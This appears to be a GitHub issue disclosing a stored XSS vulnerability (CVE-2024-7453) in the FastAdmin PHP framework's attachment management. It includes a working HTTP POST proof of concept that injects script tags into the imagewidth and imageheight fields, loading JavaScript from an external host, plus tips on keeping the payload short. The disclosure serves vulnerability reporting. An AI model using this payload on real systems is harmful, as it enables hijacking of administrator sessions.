Hebing123 / cve

0 stars 0 forks source link

FastAdmin 1.5.0.20240328 Stored XSS Vulnerability #66

Open Hebing123 opened 3 months ago

Hebing123 commented 3 months ago

Summary

FastAdmin is a PHP backend development framework that is open-source under the Apache 2.0 license. It is designed for rapid development of backend systems, featuring a permission management system based on Auth verification, and offers a one-click generation of CRUD (Create, Read, Update, Delete) functionalities.

FastAdmin 1.5.0.20240328, a version of the FastAdmin framework, contains a stored cross-site scripting (XSS) vulnerability in the "General Management - Attachment Management" section of the backend. Administrators with access to attachment management (e.g., secondary administrators) can exploit this vulnerability to target users with higher privileges.

Details

The vulnerability can be exploited by an attacker who has the ability to modify the row.imagewidth and row.imageheight parameters of an attachment. image The attacker crafts a payload that includes malicious JavaScript code, which is then stored within the database. When an administrator with higher privileges views or edits the attachment, the malicious script is executed in the context of the administrator's session, potentially allowing the attacker to perform actions on behalf of the administrator. image It is important to note that when injecting JavaScript from an external website, the length of the host header and the JavaScript file address should be kept as minimal as possible. If the length is too great, it may cause an SQL error. image

Proof of Concept (POC)

POST /swdHGFizaW.php/general/attachment/edit/ids/8?dialog=1 HTTP/1.1
Host: 192.168.0.10:1081
Content-Length: 468
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.10:1081
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

row%5Bcategory%5D=unclassed&row%5Burl%5D=%2Fuploads%2F20240801%2F75790a6f1f4d22689599732a999dffc6.zip&row%5Bimagewidth%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fxss.fb%2FtndM%3E&row%5Bimageheight%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fxss.fb%2FtndM%3E&row%5Bimagetype%5D=zip&row%5Bimageframes%5D=0&row%5Bfilename%5D=check.zip&row%5Bfilesize%5D=1922&row%5Bmimetype%5D=application%2Fx-zip-compressed&row%5Bextparam%5D=&row%5Buploadtime%5D=2024-08-01+16%3A33%3A40&row%5Bstorage%5D=local
Hebing123 commented 3 months ago

CVE-2024-7453